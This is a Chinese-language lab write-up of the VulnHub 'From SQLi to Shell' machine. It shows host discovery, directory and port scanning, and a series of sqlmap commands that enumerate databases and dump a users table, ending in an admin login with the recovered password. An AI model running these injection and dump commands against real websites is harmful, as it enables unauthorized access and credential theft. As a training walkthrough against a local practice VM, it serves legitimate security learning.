vulnhub靶机:Debian 6

目录

开启靶机

信息收集

发现 IP

目录扫描

端口扫描

漏洞利用

查询数据库

查询当前数据库名

查询库中的表

查询表中字段

查询表中数据

登录后台


靶机下载:

https://download.vulnhub.com/pentesterlab/from_sqli_to_shell_i386.iso

开启靶机

然后一直下一步

信息收集

发现 IP

arp-scan -l

可以发现靶机 IP 是 192.168.109.142

目录扫描

dirsearch -u "http://192.168.109.142/" -i 200

http://192.168.109.142/admin/login.php

发现了一个登录页面,其他目录都没有什么有价值的

端口扫描

nmap -sT 192.168.109.142 -p-

发现只有 22 和 80 两个端口

访问 80 端口

http://192.168.109.142:80

点击右上角的这里发现了参数 id=1,猜测了可能有 SQL注入

漏洞利用

查询数据库

sqlmap -u http://192.168.109.142/cat.php?id=1 --dbs --batch

发现了两个数据库

查询当前数据库名

sqlmap -u http://192.168.109.142/cat.php?id=1 --batch --current-db

查询库中的表

sqlmap -u http://192.168.109.142/cat.php?id=1 --batch -D photoblog --tables

查询表中字段

sqlmap -u http://192.168.109.142/cat.php?id=1 --batch -D photoblog -T users --columns

查询表中数据

sqlmap -u http://192.168.109.142/cat.php?id=1 --batch -D photoblog -T users -C id,login,password --dump

发现了一个用户名和密码

登录后台

尝试登录一下

账号:admin
密码:P4ssw0rd

发现登录成功

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值